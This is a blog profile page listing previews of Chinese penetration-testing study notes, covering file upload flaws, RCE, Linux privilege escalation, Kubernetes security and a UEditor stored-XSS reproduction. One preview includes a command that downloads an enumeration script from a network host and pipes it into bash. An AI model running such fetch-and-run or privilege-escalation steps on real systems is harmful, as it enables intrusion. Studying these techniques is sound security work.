logo
publist
写文章

简介

该用户还未填写简介

擅长的技术栈

可提供的服务

暂无可提供的服务

kali开启两张网卡的配置

1.开始只能使用一张网卡(注意对应的网卡名称:eth 0 )2.编辑vim /etc/network/interfaces添加静态地址auto eth1iface eth1 inet staticaddress 10.251.5.130netmask 255.255.255.0gateway 10.251.5.254或者dhcpauto eth1iface eth1 inet dhcp保存之后重启

#linux#vim#网络
文件上传漏洞详解

Micro0593 2021-06-30 22:20:22 194785上传漏洞定义文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。上传漏洞危害1.上传文件是web脚本语言,服务器的web容器

#安全#web安全#服务器
30.WEB漏洞-RCE代码及命令执行漏洞

30:WEB漏洞-RCE代码及命令执行漏洞参考文章:https://www.cnblogs.com/zhengna/p/15775737.html本文为博主学习复现笔记文章目录30:WEB漏洞-RCE代码及命令执行漏洞思维导图产生原理:漏洞形成条件:可控变量&漏洞函数RCE漏洞危害1、执行系统命令(Windows:DOS命令、linux)2、执行脚本代码(php、java、python)1

frpc启动失败总结

启动不了,可以删除注释成功启动!

k8s安全基础学习笔记

原文链接:https://zone.huoxian.cn/d/1185-k8s23 天前已编辑K8s安装有三种方式:https://minikube.sigs.k8s.io/minikube 是启动一个最小的 local 的 Kubernetes 的一个环境。minikube为什么说是最小是因为启动后会创建一个minikube vm,然后在minikube vm中创建一个单节点的k8s集群,就是说

#安全#学习#kubernetes +1
openssl passwd 手动生成密码——passwd提权

参考:https://www.cnblogs.com/liushuhe1990/articles/12298749.html引言:在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。openssl pa

#安全#linux#服务器
linux提权脚本应用

提权脚本1.LinEnumhttps://github.com/rebootuser/LinEnum下载执行wget -O - http://192.168.0.109/LinEnum.sh | bash2.linuxprivcheckerhttps://github.com/sleventyeleven/linuxprivcheckerpython3版本https://github.com/sw

#linux#运维#服务器
Arjun:一款http参数扫描器的使用

尸者狗 2020-08-29 15:10:13704收藏 2分类专栏: 安全工具 文章标签: linux版权安全工具专栏收录该内容14 篇文章0 订阅订阅专栏Arjun:一款http参数扫描器,主要就是爆破url参数的项目地址Arjun特点多线程检测彻底自动速率限制处理典型的扫描需要30秒GET/POST/JSON 方法支持25,980个参数名称的大列表下载安装git clone https://

#安全#web安全#服务器
UEditor 富文本web编辑器

大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSShttps://www.cnblogs.com/dslt/p/14903092.html一、Ueditor最新版XML文件上传导致存储型XSS测试版本:php版 v1.4.3.3下载地址:https://github.com/fex-team/ueditor 复现步骤:上传一个图片文件然后buprsuit抓包拦截3

#安全#web安全#服务器
    共 21 条
  • 1
  • 2
  • 3
  • 请选择